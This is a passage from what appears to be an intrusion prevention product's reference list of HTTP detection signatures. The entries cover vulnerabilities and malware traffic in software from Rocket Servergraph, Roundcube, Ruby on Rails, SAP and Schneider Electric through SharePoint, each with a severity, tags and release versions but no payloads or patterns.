Tags: Any Operating System, Any Hardware, Rocket software Servergraph Admin Center for TSM, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Rocket-Servergraph-Admin-Center-Filerequestor-Del-Directory-Traversal
Description:
Back to top

HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Rocket software Servergraph Admin Center for TSM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Rocket software Servergraph Admin Center for TSM, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Vulnerability: Rocket-Servergraph-Admin-Center-Filerequestor-Directory-Traversal
Description:
Back to top

HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Run-And-Runclear-Vulnerability

About this situation: An attempt to exploit a vulnerability in Rocket software Servergraph Admin Center for TSM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Rocket software Servergraph Admin Center for TSM, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1461-5242
Vulnerability: Rocket-Servergraph-Admin-Center-Filerequestor-Run-And-Runclear-Vulnerability
Description:
Back to top

HTTP_CRL-Rocket-Servergraph-Admin-Center-Userrequest-And-Tsmrequest-Command-Execution

About this situation: An attempt to exploit a vulnerability in Rocket software Servergraph Admin Center for TSM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Rocket software Servergraph Admin Center for TSM, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1561-5242
Vulnerability: Rocket-Servergraph-Admin-Center-Userrequest-And-Tsmrequest-Command-Execution
Description:
Back to top

HTTP_CRL-Rockwell-Automation-Factorytalk-Rnadiagnosticssrv-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Rockwell Automation FactoryTalk Diagnostics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation FactoryTalk Diagnostics, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: Rockwell-Automation-Factorytalk-Rnadiagnosticssrv-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Rockwell-Automation-Thinmanager-Thinserver-API-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ThinManager ThinServer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation ThinManager ThinServer, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1823-5242
Last changed: sgpkg-ips-1823-5242
Vulnerability: Rockwell-Automation-Thinmanager-Thinserver-API-Directory-Traversal
Description:
Back to top

HTTP_CRL-RodClark-sendform.cgi-Blurb-File-Disclosure

About this situation: Vulnerable sendform.cgi accessed, possible file disclosure
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, Rod Clark sendform.cgi, CVE2002, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-RodClark-sendform.cgi-Blurb-File-Disclosure
Description:
Back to top

HTTP_CRL-Roundcube-Webmail-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in Roundcube Webmail detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Roundcube-Webmail-Arbitrary-File-Read
Description:
Back to top

HTTP_CRL-Roundcube-Webmail-Archive-IMAP-Command-Injection

About this situation: An attempt to exploit a vulnerability in RoundCube RoundCube Webmail detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: Roundcube-Webmail-Archive-IMAP-Command-Injection
Description:
Back to top

HTTP_CRL-Roundcube-Webmail-ECE-Via-Config-Setting-CVE-2020-12641

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Roundcube-Webmail-RCE-Via-Config-Setting-CVE-2020-12641
Description:
Back to top

HTTP_CRL-Roxy-WI-Unauthenticated-Command-Injection-RCE

About this situation: An attempt to exploit a vulnerability in Roxy-WI detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Roxy-WI, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1499-5242
Vulnerability: Roxy-WI-Unauthenticated-Command-Injection-RCE
Description:
Back to top

HTTP_CRL-RSA-Authentication-Agent-For-Web-Redirect-BOF

About this situation: Detects buffer overflow exploits against RSA Authentication Agent for Web
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, x86, RSA Security RSA Authentication for Web for IIS, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-420-4219
Vulnerability: HTTP-RSA-Authentication-Agent-For-Web-Redirect-BOF
Description:
Back to top

HTTP_CRL-Ruby-On-Rails-Activestorage-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Ruby on Rails detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ruby on Rails, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: Ruby-On-Rails-Activestorage-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Ruby-On-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution

About this situation: An attempt to exploit a Ruby on Rails Dynamic Render File Upload Remote Code Execution vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ruby on Rails, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Ruby-On-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Ruby-On-Rails-Secret_Key_Base-Vulnerability

About this situation: An attempt to exploit a vulnerability in Ruby on Rails detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ruby on Rails, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: Ruby-On-Rails-Secret_Key_Base-Vulnerability
Description:
Back to top

HTTP_CRL-Ruby-On-Rails-Where-Hash-SQL-Injection

About this situation: An attempt to exploit a vulnerability in The Ruby on Rails Project Ruby on Rails detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ruby on Rails, CVE2012, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-1008-5242
Vulnerability: Ruby-On-Rails-Where-Hash-SQL-Injection
Description:
Back to top

HTTP_CRL-Ruby-Saml-XMLSecurity-DOCTYPE-Authentication-Bypass-CVE-2025-25291

About this situation: An attempt to exploit a vulnerability in SAML-Toolkits ruby-saml detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Ruby-Saml-XMLSecurity-DOCTYPE-Authentication-Bypass-CVE-2025-25291
Description:
Back to top

HTTP_CRL-Rudder-Server-SQLi-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in RudderStack detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, RudderStack, CVE2023, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Vulnerability: Rudder-Server-SQLi-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-SaltStack-Salt-API-SSH-Client-Command-Injection

About this situation: An attempt to exploit a vulnerability in SaltStack Salt detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SaltStack Salt, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1315-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: SaltStack-Salt-API-SSH-Client-Command-Injection
Description:
Back to top

HTTP_CRL-SaltStack-Salt-Salt.wheel.pillar_roots.write-Method-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in SaltStack Salt detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SaltStack Salt, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1431-5242
Vulnerability: SaltStack-Salt-Salt.wheel.pillar_roots.write-Method-Directory-Traversal
Description:
Back to top

HTTP_CRL-Sambar-Server-Search-Results-Buffer-Overflow

About this situation: An attempt to exploit a Sambar Server Search Results Buffer Overflow vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Sambar Server, CVE2004, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Vulnerability: Sambar-Server-Search-Results-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Saml-XML-Signature-Wrapping

About this situation: An attempt to exploit a vulnerability in SAML authentication detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, CVE2024, CVE2025, Any Operating System not specific, Any Software not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1850-5242
Vulnerability: Saml-XML-Signature-Wrapping
Ruby-Saml-Authentication-Bypass-CVE-2024-45409
Ruby-Saml-Authentication-Bypass-CVE-2025-25291
Ruby-Saml-Authentication-Bypass-CVE-2025-25292
GitHub-Enterprise-Saml-Authentication-Bypass-CVE-2024-9487
Description:
Back to top

HTTP_CRL-Samsung-Data-Manager-Hardcoded-Credentials

About this situation: An attempt to exploit a vulnerability in Samsung Data Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung Data Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Samsung-Data-Manager-Hardcoded-Credentials
Description:
Back to top

HTTP_CRL-Samsung-Data-Manager-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Samsung Data Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung Data Manager, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Samsung-Data-Manager-SQL-Injection
Description:
Back to top

HTTP_CRL-Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Samsung Security Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung Security Manager, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-649-5211
Vulnerability: Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities
Description:
Back to top

HTTP_CRL-SAP-Crystal-Reports-2008-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in SAP Crystal Reports Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Crystal Reports Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: SAP-Crystal-Reports-2008-Directory-Traversal
Description:
Back to top

HTTP_CRL-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a buffer overflow in SAP DB Web Server was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, SAP DB, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability
Description:
Back to top

HTTP_CRL-SAP-Internet-Transaction-Server-Wgate-DLL-Cross-Site-Scripting

About this situation: Detects suspicious requests to wgate.dlls ~service parameter
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, SAP Internet Transaction Server, CVE2003, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-SAP-Internet-Transaction-Server-Wgate-DLL-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-SAP-Internet-Transaction-Server-Wgate-Information-Disclosure

About this situation: Detects suspicious request that could lead to information disclosure
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SAP Internet Transaction Server, CVE2003, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: HTTP-SAP-Internet-Transaction--Server-Information-Disclosure
Description:
Back to top

HTTP_CRL-SAP-Netweaver-As-Java-XML-External-Entity

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Vulnerability: SAP-Netweaver-As-Java-XML-External-Entity
Description:
Back to top

HTTP_CRL-SAP-Soap-Information-Disclosure

About this situation: An attempt to exploit a SAP Soap Information Disclosure vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SAP SOAP, CVE2006, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: SAP-Soap-Information-Disclosure
Description:
Back to top

HTTP_CRL-SAP-SQL-Anywhere-.NET-Data-Provider-Column-Alias-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SAP SQL Anywhere detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SAP SQL Anywhere, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Vulnerability: SAP-SQL-Anywhere-.NET-Data-Provider-Column-Alias-Buffer-Overflow
Description:
Back to top

HTTP_CRL-SAP-SQL-Anywhere-.NET-Malformed-Integer-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SAP SQL Anywhere detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SAP SQL Anywhere, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1273-5242
Vulnerability: SAP-SQL-Anywhere-.NET-Malformed-Integer-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Sasfis-Bot-Traffic

About this situation: Sasfis Bot traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Sasfis-Bot
Description:
Back to top

HTTP_CRL-Satan-Ransomware-C2-Traffic

About this situation: Satan ransomware C2 traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Vulnerability: Satan-Ransomware
Description:
Back to top

HTTP_CRL-Scar.O-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Trojan.Scar.O-Botnet
Description:
Back to top

HTTP_CRL-Schneider-Electric-Pelco-Endura-Encoder

About this situation: An attempt to exploit a vulnerability in Schneider Electric Pelco Endura detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Schneider-Electric-Pelco-Endura-Encoder
Description:
Back to top

HTTP_CRL-Schneider-Electric-Struxureware-Data-Center-Expert-Command-Injection

About this situation: An attempt to exploit a vulnerability in Schneider Electric Struxureware Data Center Expert detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric Struxureware Data Center Expert, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1394-5242
Vulnerability: Schneider-Electric-Struxureware-Data-Center-Expert-Command-Injection
Description:
Back to top

HTTP_CRL-Schneider-Electric-U.motion-Builder-css.inc.php-Arbitrary-File-Inclusion

About this situation: A Schneider Electric U.motion Builder css.inc.php Arbitrary File Inclusion vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Schneider Electric U.motion Builder, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-935-5242
Last changed: sgpkg-ips-938-5242
Vulnerability: Schneider-Electric-U.motion-Builder-css.inc.php-Arbitrary-File-Inclusion
Description:
Back to top

HTTP_CRL-Schneider-Electric-U.motion-Builder-loadtemplate.php-SQL-Injection

About this situation: A Schneider Electric U.motion Builder loadtemplate.php SQL Injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Schneider Electric U.motion Builder, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-937-5242
Vulnerability: Schneider-Electric-U.motion-Builder-loadtemplate.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Schneider-Electric-U.motion-Builder-Localize-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Schneider Electric U.motion Builder detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric U.motion Builder, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-945-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: Schneider-Electric-U.motion-Builder-Localize-SQL-Injection
Description:
Back to top

HTTP_CRL-Schneider-Electric-U.motion-Builder-nfcserver.php-SQL-Injection

About this situation: A Schneider Electric U.motion Builder nfcserver.php SQL Injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Schneider Electric U.motion Builder, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-983-5242
Vulnerability: Schneider-Electric-U.motion-Builder-nfcserver.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Schneider-Electric-U.motion-Builder-runscript.php-Directory-Traversal

About this situation: A Schneider Electric U.motion Builder runscript.php Directory Traversal vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Schneider Electric U.motion Builder, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-937-5242
Vulnerability: Schneider-Electric-U.motion-Builder-runscript.php-Directory-Traversal
Description:
Back to top

HTTP_CRL-Schneider-Electric-U.motion-Builder-Track-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Schneider Electric U.motion Builder detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric U.motion Builder, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: Schneider-Electric-U.motion-Builder-Track-SQL-Injection
Description:
Back to top

HTTP_CRL-School-Management-Pro-Wordpress-Plugin-Backdoor-CVE-2022-1609

About this situation: An attempt to exploit a vulnerability in School Management Pro WordPress plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: School-Management-Pro-Wordpress-Plugin-Backdoor-CVE-2022-1609
Description:
Back to top

HTTP_CRL-Script-In-Get-Request

About this situation: Detects scripts within request lines
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-483-5211
Vulnerability: HTTP-Php-Phpinfo-XSS
HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Script-In-Request

About this situation: Detects scripts within request lines
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-483-5211
Vulnerability: HTTP-Php-Phpinfo-XSS
HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Script-In-URL-Parameters

About this situation: A script was used in the URL parameters
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1607-5242
Description:
Back to top

HTTP_CRL-Serendipity-FrontPage-SQL-Injection

About this situation: Detected an attempt to exploit a SQL injection vulnerability against S9Y Serendipity
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, S9Y Serendipity, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-160-2032
Last changed: sgpkg-ips-160-2032
Vulnerability: Serendipity-FrontPage-SQL-Injection
Description:
Back to top

HTTP_CRL-ServHelper-Malware-Infection-Traffic

About this situation: ServHelper malware infection traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Vulnerability: ServHelper-Malware-Infection-Traffic
Description:
Back to top

HTTP_CRL-Serviio-Media-Server-checkStreamUrl-Command-Execution

About this situation: A Serviio Media Server checkStreamUrl Command Execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Serviio Media Server, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1016-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Serviio-Media-Server-checkStreamUrl-Command-Execution
Description:
Back to top

HTTP_CRL-Sgi-Cgi-Infosearch-Fname-Usage

About this situation: Usage of vulnerable variable in script
Context: HTTP Normalized Request-Line
Severity: 7
Tags: IRIX, Any Hardware, SGI InfoSearch, CVE2000, IRIX not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-Sgi-Infosearch-Fname-Cmd-Exec
Description:
Back to top

HTTP_CRL-ShadowPad-C2-Traffic

About this situation: ShadowPad C2 traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Vulnerability: ShadowPad-C2-Traffic
Description:
Back to top

HTTP_CRL-Shared-Variables

About this situation: Fingerprints that set variables shared between multiple fingerprints
Context: HTTP Normalized Request-Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1844-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_CRL-Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950

About this situation: An attempt to exploit a vulnerability in Sharepoint detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2023-05, CVE2023, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1624-5242
Last changed: sgpkg-ips-1624-5242
Vulnerability: Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950
Description:
Back to top

HTTP_CRL-Sharepoint-Server-Access-Control-Exploit

About this situation: Detects malicious HTTP requests targetting MS08-077
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, MS2008-12, CVE2008, Windows not specific, Microsoft Office SharePoint Server not specific, Potential Disclosure, TCP Client Traffic
